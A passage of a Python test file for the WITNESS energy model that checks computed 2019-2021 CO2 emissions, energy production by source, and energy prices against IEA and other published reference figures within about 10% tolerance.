self.assertLessEqual(computed_coal_co2_emissions,
coal_co2_emissions * 1.1)
self.assertGreaterEqual(
computed_coal_co2_emissions, coal_co2_emissions * 0.9)
print(
f'Coal CO2 emissions : ourworldindata {coal_co2_emissions} Mt vs WITNESS {computed_coal_co2_emissions} TWh')
'''
Oil CO2 emissions are emissions from oil energy
'''
computed_oil_co2_emissions = co2_emissions_by_energy['fuel.liquid_fuel'].loc[
co2_emissions_by_energy['years'] == 2020].values[0]
# we compare in Mt and must be near 10% of error
self.assertLessEqual(computed_oil_co2_emissions,
oil_co2_emissions * 1.1)
self.assertGreaterEqual(
computed_oil_co2_emissions, oil_co2_emissions * 0.9)
print(
f'Oil CO2 emissions : ourworldindata {oil_co2_emissions} Mt vs WITNESS {computed_oil_co2_emissions} TWh')
'''
Total CO2 emissions are emissions from oil energy
'''
sources = self.ee.dm.get_value(
'Test.CCUS.CO2_emissions_by_use_sources')
sinks = self.ee.dm.get_value('Test.CCUS.CO2_emissions_by_use_sinks')[
'CO2_resource removed by energy mix (Gt)'].values[0]
sources_sum = sources.loc[sources['years'] == 2020][[
col for col in sources.columns if col != 'years']].sum(axis=1)[0]
computed_total_co2_emissions = (sources_sum - sinks) * 1000
# we compare in Mt and must be near 10% of error
print(
f'Total CO2 emissions : ourworldindata {total_co2_emissions} Mt vs WITNESS {computed_total_co2_emissions} TWh')
self.assertLessEqual(computed_total_co2_emissions,
total_co2_emissions * 1.1)
self.assertGreaterEqual(
computed_total_co2_emissions, total_co2_emissions * 0.9)
def test_03_check_net_production_values(self):
'''
Test order of magnitude of net energy production with values from Energy Balances IEA 2019:
Source: IEA 2022, Data Tables, https://www.iea.org/data-and-statistics/data-tables?country=WORLD&energy=Balances&year=2019,
License: CC BY 4.0.
'''
self.ee.execute()
# These emissions are in Gt
net_energy_production = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.energy_production_detailed')
energy_production = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.energy_production_brut_detailed')
'''
Theory in 2019 from Energy Balances IEA 2019 expressed in TWh
'''
'''
Coal balances
'''
print('---------- Coal balances -------------')
coal_energy_own_use = 952.78
print(
f'Energy own use for coal production is {coal_energy_own_use} TWh and now taken into account into raw production')
energy_production_raw_coal_iea = 46666 - coal_energy_own_use # TWH
coal_raw_prod = energy_production['production solid_fuel (TWh)'][0]
error_coalraw_prod = np.abs(
energy_production_raw_coal_iea - coal_raw_prod) / energy_production_raw_coal_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('coal raw production error : ', error_coalraw_prod, ' %',
f'IEA :{energy_production_raw_coal_iea} TWh vs WITNESS :{coal_raw_prod} TWh')
# elec plants needs
elec_plants = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.electricity.energy_consumption')[
'solid_fuel (TWh)'][0] * 1000.0
elec_plants_coal_IEA = 20194.44 # TWh
error_elec_plants = np.abs(
elec_plants_coal_IEA - elec_plants) / elec_plants_coal_IEA * 100.0
# we compare in TWh and must be near 10% of error
self.assertLessEqual(error_elec_plants,
10.0)
print('coal used by electricity plants error : ', error_elec_plants, ' %',
f'IEA :{elec_plants_coal_IEA} TWh vs WITNESS :{elec_plants} TWh')
# syngas plants needs
syngas_plants = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.syngas.energy_consumption')[
'solid_fuel (TWh)'][0] * 1000.0
liquefaction_plants_coal_IEA = 264.72 # TWh
error_syngas_plants = np.abs(
liquefaction_plants_coal_IEA - syngas_plants) / liquefaction_plants_coal_IEA * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_syngas_plants,
# 10.0)
print('coal used by syngas plants error : ', error_syngas_plants, ' %',
f'IEA :{liquefaction_plants_coal_IEA} TWh vs WITNESS :{syngas_plants} TWh')
coal_used_by_energy = energy_production[
'production solid_fuel (TWh)'][0] - net_energy_production[
'production solid_fuel (TWh)'][0]
# chp plants and heat plantstechnology not implemented
chp_plants = 8222.22 + 289 # TWh
print('CHP and heat plants not implemented corresponds to ',
chp_plants / coal_used_by_energy * 100.0, ' % of coal used by energy : ', chp_plants, ' TWh')
# coal to gas technology not implemented
gas_works = 196.11 # Twh
coal_total_final_consumption = net_energy_production[
'production solid_fuel (TWh)'][0]
print('Coal to gas plants not implemented corresponds to ',
gas_works / coal_used_by_energy * 100.0, ' % of coal used by energy')
coal_total_final_consumption = net_energy_production[
'production solid_fuel (TWh)'][0]
coal_total_final_consumption_iea = 11055 # TWH
error_coalnet_prod = np.abs(
coal_total_final_consumption_iea - coal_total_final_consumption) / coal_total_final_consumption_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('coal net production error : ', error_coalnet_prod, ' %',
f'IEA :{coal_total_final_consumption_iea} TWh vs WITNESS :{coal_total_final_consumption} TWh')
print('CHP and heat plants not taken into account for coal consumption explains the differences')
'''
Gas balances
'''
print('---------- Gas balances -------------')
energy_own_use = 3732.83
print('Energy industry own use covers the amount of fuels used by the energy producing industries (e.g. for heating, lighting and operation of all equipment used in the extraction process, for traction and for distribution)')
print(
f'Energy own use for methane production is {energy_own_use} TWh and now taken into account into raw production')
energy_production_raw_gas_iea = 40000 - energy_own_use # TWH
gas_raw_prod = energy_production['production methane (TWh)'][0]
error_gasraw_prod = np.abs(
energy_production_raw_gas_iea - gas_raw_prod) / energy_production_raw_gas_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('gas raw production error : ', error_gasraw_prod, ' %',
f'IEA :{energy_production_raw_gas_iea} TWh vs WITNESS :{gas_raw_prod} TWh')
# elec plants needs
elec_plants = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.electricity.energy_consumption')[
'methane (TWh)'][0] * 1000.0
elec_plants_gas_IEA = 10833.33 # TWh
chp_plants_iea = 3887.05 + 709 # TWh
error_elec_plants = np.abs(
elec_plants_gas_IEA - elec_plants) / elec_plants_gas_IEA * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_elec_plants,
# 10.0)
print('gas used by electricity plants error : ',
error_elec_plants, ' %',
f'IEA :{elec_plants_gas_IEA } TWh vs WITNESS :{elec_plants} TWh')
methane_used_by_energy = energy_production[
'production methane (TWh)'][0] - net_energy_production[
'production methane (TWh)'][0]
print('CHP and heat plants not implemented corresponds to ',
chp_plants_iea / methane_used_by_energy * 100.0, ' % of methane used by energy : ', chp_plants_iea, ' TWh')
# syngas plants needs
syngas_plants = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.syngas.energy_consumption')[
'methane (TWh)'][0] * 1000.0
liquefaction_plants_methane_IEA = 202.74 # TWh
other_transformation = 277.5 # TWH
# other transformaton includes the transformation of natural gas for
# hydrogen manufacture
error_syngas_plants = np.abs(
liquefaction_plants_methane_IEA + other_transformation - syngas_plants) / liquefaction_plants_methane_IEA * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_syngas_plants,
# 10.0)
print('methane used by syngas plants error : ',
error_syngas_plants, ' %',
f'IEA :{liquefaction_plants_methane_IEA + other_transformation} TWh vs WITNESS :{syngas_plants} TWh')
methane_total_final_consumption = net_energy_production[
'production methane (TWh)'][0]
methane_total_final_consumption_iea = 19001 # TWH
error_methanenet_prod = np.abs(
methane_total_final_consumption_iea - methane_total_final_consumption) / methane_total_final_consumption_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('methane net production error : ', error_methanenet_prod, ' %',
f'IEA :{methane_total_final_consumption_iea} TWh vs WITNESS :{methane_total_final_consumption} TWh')
print('CHP and heat plants not taken into account for methane consumption explains some differences')
'''
Electricity balances
'''
print('---------- Electricity balances -------------')
net_elec_prod = net_energy_production[
'production electricity (TWh)'][0]
net_elec_prod_iea = 22847.66 # TWh
error_net_elec_prod = np.abs(
net_elec_prod_iea - net_elec_prod) / net_elec_prod_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('Net electricity production error : ', error_net_elec_prod, ' %',
f'IEA :{net_elec_prod_iea} TWh vs WITNESS :{net_elec_prod} TWh')
energy_production_raw_hydro_iea = 4222.22 # TWH
elec_hydropower_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.Hydropower.techno_production')
computed_hydropower_production = elec_hydropower_prod['electricity (TWh)'].loc[
elec_hydropower_prod['years'] == 2020].values[0] * 1000
error_hydropowerraw_prod = np.abs(
energy_production_raw_hydro_iea - computed_hydropower_production) / energy_production_raw_hydro_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('hydropower raw production error : ', error_hydropowerraw_prod, ' %',
f'IEA :{energy_production_raw_hydro_iea} TWh vs WITNESS :{computed_hydropower_production} TWh')
energy_production_raw_wind_iea = 1427.41 # TWH
elec_windonshore_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.WindOnshore.techno_production')
elec_windoffshore_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.WindOffshore.techno_production')
computed_wind_production = elec_windonshore_prod['electricity (TWh)'].loc[
elec_windonshore_prod['years'] == 2020].values[0] * 1000.0 + \
elec_windoffshore_prod['electricity (TWh)'].loc[
elec_windoffshore_prod['years'] == 2020].values[0] * 1000.0
error_wind_prod = np.abs(
energy_production_raw_wind_iea - computed_wind_production) / energy_production_raw_wind_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_wind_prod,
# 10.0)
print('Wind raw production error : ', error_wind_prod, ' %',
f'IEA :{energy_production_raw_wind_iea} TWh vs WITNESS :{computed_wind_production} TWh')
elec_solar_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.SolarPv.techno_production')
computed_solarpv_production = elec_solar_prod['electricity (TWh)'].loc[
elec_solar_prod['years'] == 2020].values[0] * 1000
energy_production_solarpv_iea = 680.9 # TWh
error_solarpv_prod = np.abs(
energy_production_solarpv_iea - computed_solarpv_production) / energy_production_solarpv_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Solar PV raw production error : ', error_solarpv_prod, ' %',
f'IEA :{energy_production_solarpv_iea} TWh vs WITNESS :{computed_solarpv_production} TWh')
elec_solarth_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.SolarThermal.techno_production')
computed_solarth_production = elec_solarth_prod['electricity (TWh)'].loc[
elec_solarth_prod['years'] == 2020].values[0] * 1000
energy_production_solarth_iea = 13.36 # TWh
error_solarth_prod = np.abs(
energy_production_solarth_iea - computed_solarth_production) / energy_production_solarth_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Solar Thermal raw production error : ', error_solarth_prod, ' %',
f'IEA :{energy_production_solarth_iea} TWh vs WITNESS :{computed_solarth_production} TWh')
elec_geoth_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.Geothermal.techno_production')
computed_geoth_production = elec_geoth_prod['electricity (TWh)'].loc[
elec_geoth_prod['years'] == 2020].values[0] * 1000.0
energy_production_geoth_iea = 91.09 # TWh
error_geoth_prod = np.abs(
energy_production_geoth_iea - computed_geoth_production) / energy_production_geoth_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Geothermal raw production error : ', error_geoth_prod, ' %',
f'IEA :{energy_production_geoth_iea} TWh vs WITNESS :{computed_geoth_production} TWh')
elec_coalgen_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.CoalGen.techno_production')
computed_coalgen_production = elec_coalgen_prod['electricity (TWh)'].loc[
elec_coalgen_prod['years'] == 2020].values[0] * 1000.0
energy_production_coalgen_iea = 9914.45 # TWh
error_geoth_prod = np.abs(
energy_production_coalgen_iea - computed_coalgen_production) / energy_production_coalgen_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Coal generation raw production error : ', error_geoth_prod, ' %',
f'IEA :{energy_production_coalgen_iea} TWh vs WITNESS :{computed_coalgen_production} TWh')
elec_oilgen_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.OilGen.techno_production')
computed_oilgen_production = elec_oilgen_prod['electricity (TWh)'].loc[
elec_oilgen_prod['years'] == 2020].values[0] * 1000.0
energy_production_oilgen_iea = 747 # TWh
error_oil_prod = np.abs(
energy_production_oilgen_iea - computed_oilgen_production) / energy_production_oilgen_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Oil generation raw production error : ', error_oil_prod, ' %',
f'IEA :{energy_production_oilgen_iea} TWh vs WITNESS :{computed_oilgen_production} TWh')
elec_gt_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.GasTurbine.techno_production')
elec_cgt_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.CombinedCycleGasTurbine.techno_production')
computed_gasgen_production = elec_gt_prod['electricity (TWh)'].loc[
elec_gt_prod['years'] == 2020].values[0] * 1000.0 + elec_cgt_prod['electricity (TWh)'].loc[
elec_cgt_prod['years'] == 2020].values[0] * 1000.0
energy_production_gasgen_iea = 6346 # TWh
error_gasgen_prod = np.abs(
energy_production_gasgen_iea - computed_gasgen_production) / energy_production_gasgen_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Gas generation raw production error : ', error_gasgen_prod, ' %',
f'IEA :{energy_production_gasgen_iea} TWh vs WITNESS :{computed_gasgen_production} TWh')
elec_nuclear_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.Nuclear.techno_production')
computed_nuclear_production = elec_nuclear_prod['electricity (TWh)'].loc[
elec_nuclear_prod['years'] == 2020].values[0] * 1000.0
energy_production_nuclear_iea = 2789.69 # TWh
error_geoth_prod = np.abs(
energy_production_nuclear_iea - computed_nuclear_production) / energy_production_nuclear_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Nuclear raw production error : ', error_geoth_prod, ' %',
f'IEA :{energy_production_nuclear_iea} TWh vs WITNESS :{computed_nuclear_production} TWh')
energy_production_oilgen_iea = 747 # TWh
energy_production_biofuelgen_iea = 542.56 # TWh
print(
f'Technologies of electricity generation with oil ({energy_production_oilgen_iea} TWh) and biofuel ({energy_production_biofuelgen_iea} TWh) are not yet implemented')
'''
Biofuels and waste balances
'''
print('---------- Biomass dry balances -------------')
print('We consider biomass_dry equals to the sum of primary solid biofuels (no municipal/industiral waste) but in the doc they do not consider crop residues')
biomass_dry_raw_prod_iea = (
48309940) / 3600 # TWh 1414648 + 1142420 +
biomass_dry_net_prod_iea = (36537355) / 3600 # TWh + 150882 + 519300
# managed_wood_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.biomass_dry.ManagedWood.techno_production')
#
# computed_managed_wood_prod = managed_wood_prod['biomass_dry (TWh)'].loc[
# managed_wood_prod['years'] == 2020].values[0] * 1000.0
#
# unmanaged_wood_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.biomass_dry.UnmanagedWood.techno_production')
#
# computed_unmanaged_wood_prod = unmanaged_wood_prod['biomass_dry (TWh)'].loc[
# unmanaged_wood_prod['years'] == 2020].values[0] * 1000.0
#
# crop_energy_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.biomass_dry.CropEnergy.techno_production')
#
# computed_crop_energy_prod = crop_energy_prod['biomass_dry (TWh)'].loc[
# crop_energy_prod['years'] == 2020].values[0] * 1000.0
#
biomass_dry_net_prod = net_energy_production[
'production biomass_dry (TWh)'][0] # - computed_crop_energy_prod
#
biomass_dry_raw_prod = energy_production[
'production biomass_dry (TWh)'][0]
error_biomassdry_raw_prod = np.abs(
biomass_dry_raw_prod_iea - biomass_dry_raw_prod) / biomass_dry_raw_prod_iea * 100.0
print('Biomass dry raw production error : ', error_biomassdry_raw_prod, ' %',
f'IEA :{biomass_dry_raw_prod_iea} TWh vs WITNESS :{biomass_dry_raw_prod} TWh')
error_biomassdry_net_prod = np.abs(
biomass_dry_net_prod_iea - biomass_dry_net_prod) / biomass_dry_net_prod_iea * 100.0
print('Biomass dry net production error : ', error_biomassdry_net_prod, ' %',
f'IEA :{biomass_dry_net_prod_iea} TWh vs WITNESS :{biomass_dry_net_prod} TWh')
#
# biomass_dry_elec_plants = 3650996 / 3600 # TWh
# biomass_dry_chp_plants = (2226110 + 324143) / 3600 # TWh
# biomass_dry_otherrtransf = 5220384 / 3600 # TWh
#
# print('CHP and heat plants using biomass are not implemented corresponds to ',
# biomass_dry_chp_plants / biomass_dry_raw_prod_iea * 100.0, ' % of biomass raw production : ', biomass_dry_chp_plants, ' TWh')
# print('Electricity plants using biomass are not implemented corresponds to ',
# biomass_dry_elec_plants / biomass_dry_raw_prod_iea * 100.0, ' % of biomass raw production : ', biomass_dry_elec_plants, ' TWh')
#
# biogas_cons = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.biogas.energy_consumption')
#
# biomass_by_biogas_cons = biogas_cons['wet_biomass (Mt)'].loc[
# biogas_cons['years'] == 2020].values[0] * 1000 * 3.6 # 3.6 is calorific value of biomass_dry
#
# syngas_cons = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.solid_fuel.energy_consumption')
#
# biomass_by_syngas_cons = syngas_cons['biomass_dry (TWh)'].loc[
# syngas_cons['years'] == 2020].values[0] * 1000
#
# solid_fuel_cons = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.solid_fuel.energy_consumption')
#
# biomass_by_solid_fuel_cons = solid_fuel_cons['biomass_dry (TWh)'].loc[
# solid_fuel_cons['years'] == 2020].values[0] * 1000
#
# biomass_dry_otherrtransf_witness = biomass_by_solid_fuel_cons + biomass_by_syngas_cons
# biomass_dry_otherrtransf_with_ana = biomass_by_biogas_cons + \
# biomass_dry_otherrtransf_witness
#
# error_biomassdry_otherrtransf_prod = np.abs(
# biomass_dry_otherrtransf - biomass_dry_otherrtransf_witness) / biomass_dry_otherrtransf * 100.0
#
# print('Biomass dry other transformation production error : ', error_biomassdry_otherrtransf_prod, ' %',
# f'IEA :{biomass_dry_otherrtransf} TWh vs WITNESS :{biomass_dry_otherrtransf_witness} TWh')
#
# error_biomassdry_otherrtransf_with_ana_prod = np.abs(
# biomass_dry_otherrtransf - biomass_dry_otherrtransf_with_ana) / biomass_dry_otherrtransf * 100.0
#
# print('Biomass dry other transformation (adding anaerobic digestion) production error : ', error_biomassdry_otherrtransf_with_ana_prod, ' %',
# f'IEA :{biomass_dry_otherrtransf} TWh vs WITNESS with anaerobic
# digestion :{biomass_dry_otherrtransf_with_ana} TWh')
print('---------- liquid biofuels balances -------------')
print('IEA biofuels includes bioethanol (ethanol produced from biomass), biomethanol (methanol produced from biomass), bioETBE (ethyl-tertio-butyl-ether produced on the basis of bioethanol) and bioMTBE (methyl-tertio-butyl-ether produced on the basis of biomethanol')
print('and biodiesel (a methyl-ester produced from vegetable or animal oil, of diesel quality), biodimethylether (dimethylether produced from biomass), Fischer Tropsch (Fischer Tropsch produced from biomass), cold pressed bio-oil (oil produced from oil seed through mechanical processing only) ')
raw_biodiesel_prod = energy_production[
'production fuel.biodiesel (TWh)'][0]
raw_hydrotreated_oil_fuel_prod = energy_production[
'production fuel.hydrotreated_oil_fuel (TWh)'][0]
raw_liquid_fuel = raw_biodiesel_prod + \
raw_hydrotreated_oil_fuel_prod
liquidbiofuels_raw_prod_iea = 131224 * 1e6 * 11.9 / 1e9 # in kt
error_liquid_fuel_raw_prod = np.abs(
liquidbiofuels_raw_prod_iea - raw_liquid_fuel) / liquidbiofuels_raw_prod_iea * 100.0
print('Liquid fuels raw production error : ', error_liquid_fuel_raw_prod, ' %',
f'IEA :{liquidbiofuels_raw_prod_iea} TWh vs WITNESS :{raw_liquid_fuel} TWh')
print(
'A lot of biofuels are not implemented (no details of specific biofuels productions ')
print('---------- Biogases balances -------------')
print('In IEA, biogas are mainly gases from the anaerobic digestion but also can be produced from thermal processes (pyrolysis) or from syngas')
print('WITNESS model considers only anaerobic digestion')
raw_biogas_prod = energy_production[
'production biogas (TWh)'][0]
biogas_raw_prod_iea = 1434008 / 3600
error_biogas_raw_prod = np.abs(
biogas_raw_prod_iea - raw_biogas_prod) / biogas_raw_prod_iea * 100.0
print('Biogas raw production error : ', error_biogas_raw_prod, ' %',
f'IEA :{biogas_raw_prod_iea} TWh vs WITNESS :{raw_biogas_prod} TWh')
print(
f'Biogas is used in energy industry mainly for electricity plants {448717/3600} TWh and CHP plants {385127/3600} TWh')
print('These technologies are not yet implemented in WITNESS models, then :')
biogas_net_prod_iea = 521188 / 3600
net_biogas_prod = net_energy_production[
'production biogas (TWh)'][0]
error_biogas_net_prod = np.abs(
biogas_net_prod_iea - net_biogas_prod) / biogas_net_prod_iea * 100.0
print('Biogas net production error : ', error_biogas_net_prod, ' %',
f'IEA :{biogas_net_prod_iea} TWh vs WITNESS :{net_biogas_prod} TWh')
'''
Oil balances
'''
print('---------- Oil balances -------------')
iea_data_oil = {'kerosene': (14082582 + 2176724) / 3600,
# gasoline + diesel
'gasoline': (41878252 + 56524612) / 3600,
#'diesel': 56524612 / 3600,
#'naphtas' :11916946/3600,
'heating_oil': 16475667 / 3600, # equivalent to fuel oil
#'other_oil_products' :25409482/3600,
'liquefied_petroleum_gas': 5672984 / 3600, # LPG/ethane
'fuel.liquid_fuel': 190442343 / 3600 # total of crude oil
}
raw_refinery_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.fuel.liquid_fuel.Refinery.techno_production')
raw_refinery_prod_2020 = raw_refinery_prod.loc[
raw_refinery_prod['years'] == 2020] * 1000.0
for oil_name, oil_prod in iea_data_oil.items():
oil_prod_witness = raw_refinery_prod_2020[
f'{oil_name} (TWh)'].values[0]
error_oil_prod = np.abs(
oil_prod - oil_prod_witness) / oil_prod * 100.0
print(f'{oil_name} raw production error : ', error_oil_prod, ' %',
f'IEA :{oil_prod} TWh vs WITNESS :{oil_prod_witness} TWh')
print(
'WITNESS model only takes for now raw liquid_fuel production which is correct')
net_liquid_fuel_prod = net_energy_production[
'production fuel.liquid_fuel (TWh)'][0]
liquid_fuel_net_prod_iea = 168375005 / 3600
error_liquid_fuel_net_prod = np.abs(
liquid_fuel_net_prod_iea - net_liquid_fuel_prod) / liquid_fuel_net_prod_iea * 100.0
print('Liquid fuel net production error : ', error_liquid_fuel_net_prod, ' %',
f'IEA :{liquid_fuel_net_prod_iea} TWh vs WITNESS :{net_liquid_fuel_prod} TWh')
liquid_fuel_own_use = 2485.89 # TWH
liquid_fuel_raw_prod = raw_refinery_prod_2020[
f'fuel.liquid_fuel (TWh)'].values[0]
energy_production_raw_liquidfuel_iea = 52900 - liquid_fuel_own_use
print(
f'Energy own use for liquid fuel production is {liquid_fuel_own_use} TWh')
print('Liquid fuel raw production error : ', error_liquid_fuel_net_prod, ' %',
f'IEA :{energy_production_raw_liquidfuel_iea} TWh vs WITNESS :{liquid_fuel_raw_prod} TWh')
chp_plants = 159.62 + 99.81 # TWh
print('CHP and heat plants not implemented corresponds to ',
chp_plants / liquid_fuel_raw_prod * 100.0, ' % of total raw liquid fuel production : ', chp_plants, ' TWh')
oil_elec_plants = 1591.67 # TWh
# elec plants needs
elec_plants_oil = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.electricity.energy_consumption')[
'fuel.liquid_fuel (TWh)'][0] * 1000.0
error_oil_cons = np.abs(
oil_elec_plants - elec_plants_oil) / oil_elec_plants * 100.0
print('Liquid fuel consumption from elec error : ', error_oil_cons, ' %',
f'IEA :{oil_elec_plants} TWh vs WITNESS :{elec_plants_oil} TWh')
print('----------------- Total production -------------------')
total_raw_prod_iea = 173340 # TWh
total_raw_prod = energy_production['Total production'][0]
error_total_raw_prod = np.abs(
total_raw_prod_iea - total_raw_prod) / total_raw_prod_iea * 100.0
print('Total raw production error : ', error_total_raw_prod, ' %',
f'IEA :{total_raw_prod_iea} TWh vs WITNESS :{total_raw_prod} TWh')
total_net_prod_iea = 116103 # TWh
total_net_prod = net_energy_production['Total production'][0]
error_total_net_prod = np.abs(
total_net_prod_iea - total_net_prod) / total_net_prod_iea * 100.0
print('Total net production error : ', error_total_net_prod, ' %',
f'IEA :{total_net_prod_iea} TWh vs WITNESS :{total_net_prod} TWh')
def test_04_check_prices_values(self):
'''
Test order of magnitude of prices
Source: IEA 2022, Data Tables, https://www.iea.org/data-and-statistics/data-tables?country=WORLD&energy=Balances&year=2019,
License: CC BY 4.0.
'''
self.ee.execute()
# These emissions are in Gt
energy_prices = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.energy_prices')
energy_prices_after_tax = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.energy_prices_after_tax')
'''
Energy prices
'''
print('Comparison of prices coming from globalpetrolprices.com')
elec_price_iea = 137 # $/MWh
elec_price = energy_prices[
'electricity'][0]
error_elec_price = np.abs(
elec_price_iea - elec_price) / elec_price_iea * 100.0
print('Electricity price error in 2021: ', error_elec_price, ' %',
f'globalpetrolprices.com :{elec_price_iea} $/MWh vs WITNESS :{elec_price} $/MWh')
ng_price_iea_2022 = 1.17 / 0.657e-3 / 13.9 # $/MWh
ng_price_iea_2021 = 0.8 / 0.657e-3 / 13.9 # $/MWh
ng_price = energy_prices[
'methane'][0]
error_ng_price = np.abs(
ng_price_iea_2021 - ng_price) / ng_price_iea_2021 * 100.0
print('Natural Gas/Methane price error in 2021 : ', error_ng_price, ' %',
f'globalpetrolprices.com :{ng_price_iea_2021} $/MWh vs WITNESS :{ng_price} $/MWh')
kerosene_price_iea = 0.92 / 0.0095 # $/MWh in 2022
kerosene_price_iea_2021 = 2.8 / 39.5 * 1000 # $/MWh in 2021
kerosene_price = energy_prices[
'fuel.liquid_fuel'][0]
error_kerosene_price = np.abs(
kerosene_price_iea_2021 - kerosene_price) / kerosene_price_iea_2021 * 100.0
print('kerosene price error in 2021 : ', error_kerosene_price, ' %',
f'globalpetrolprices.com :{kerosene_price_iea_2021} $/MWh vs WITNESS :{kerosene_price} $/MWh')
print('hydrogen prices details have been found on IEA website :https://www.iea.org/data-and-statistics/charts/global-average-levelised-cost-of-hydrogen-production-by-energy-source-and-technology-2019-and-2050 ')
hydrogen_prices = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.hydrogen.gaseous_hydrogen.energy_detailed_techno_prices')
smr_price_iea = 1.6 / 33.3 * 1000 # between 0.7 and 1.6 $/kg mean : 1.15 $/kg
# between 1.9 and 2.5 $/kg mean : 2.2 $/kg
coal_gas_price_iea = 2.5 / 33.3 * 1000
wgs_price = hydrogen_prices[
'WaterGasShift'][0]
wgs_price_iea = 0.75 * smr_price_iea + 0.25 * coal_gas_price_iea
error_wgs_price = np.abs(
wgs_price_iea - wgs_price) / wgs_price_iea * 100.0
print('Hydrogen price by watergas shift (coal and gas) error in 2021: ', error_wgs_price, ' %',
f'IEA :{wgs_price_iea} $/MWh vs WITNESS :{wgs_price} $/MWh')
electrolysis_price_iea = 7.7 / 33.3 * 1000 # between 3.2 and 7.7 $/kg
electrolysis_price = hydrogen_prices[
'Electrolysis.SOEC'][0]
error_electrolysis_price = np.abs(
electrolysis_price_iea - electrolysis_price) / electrolysis_price_iea * 100.0
print('Hydrogen price by Electrolysis error in 2021: ', error_electrolysis_price, ' %',
f'IEA :{electrolysis_price_iea} $/MWh vs WITNESS :{electrolysis_price} $/MWh')
biogas_price_gazpack = 30 / 0.293 # 30 $/mbtu
biogas_price = energy_prices[
'biogas'][0]
error_biogas_price = np.abs(
biogas_price_gazpack - biogas_price) / biogas_price_gazpack * 100.0
print('Biogas price error in 2019: ', error_biogas_price, ' %',
f'gazpack.nl/ :{biogas_price_gazpack} $/MWh vs WITNESS :{biogas_price} $/MWh')
# between 50 and 100 $ /tonne
coal_price_ourworldindata = 50 * 1e-3 / 4.86 * 1e3
coal_price = energy_prices[
'solid_fuel'][0]
error_coal_price = np.abs(
coal_price_ourworldindata - coal_price) / coal_price_ourworldindata * 100.0
print('Coal price error in 2021: ', error_coal_price, ' %',
f'ourworldindata.com :{coal_price_ourworldindata} $/MWh vs WITNESS :{coal_price} $/MWh')
biodiesel_price_neste = 1500 / 10.42
biodiesel_price = energy_prices[
'fuel.biodiesel'][0]
error_biodiesel_price = np.abs(
biodiesel_price_neste - biodiesel_price) / biodiesel_price_neste * 100.0
print('Biodiesel price error in 2021: ', error_biodiesel_price, ' %',
f'neste.com :{biodiesel_price_neste} $/MWh vs WITNESS :{biodiesel_price} $/MWh')
biomass_price_statista = 35 / 3.6
biomass_price = energy_prices[
'biomass_dry'][0]
error_biomass_price = np.abs(
biomass_price_statista - biomass_price) / biomass_price_statista * 100.0
print('Biomass price error in 2021: ', error_biomass_price, ' %',
f'US statista.com :{biomass_price_statista} $/MWh vs WITNESS :{biomass_price} $/MWh')
hefa_price_iea = 1.2 / 780e-3 / 12.2 * 1000
hefa_price = energy_prices[
'fuel.hydrotreated_oil_fuel'][0]
error_hefa_price = np.abs(
hefa_price_iea - hefa_price) / hefa_price_iea * 100.0
print('HEFA price error in 2020: ', error_hefa_price, ' %',
f'IEA :{hefa_price_iea} $/MWh vs WITNESS :{hefa_price} $/MWh')
print('------------- Electricity prices --------------')
elec_detailed_prices = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.energy_detailed_techno_prices')
elec_detailed_prices['Nuclear'].values[0]
if '__main__' == __name__:
t0 = time.time()
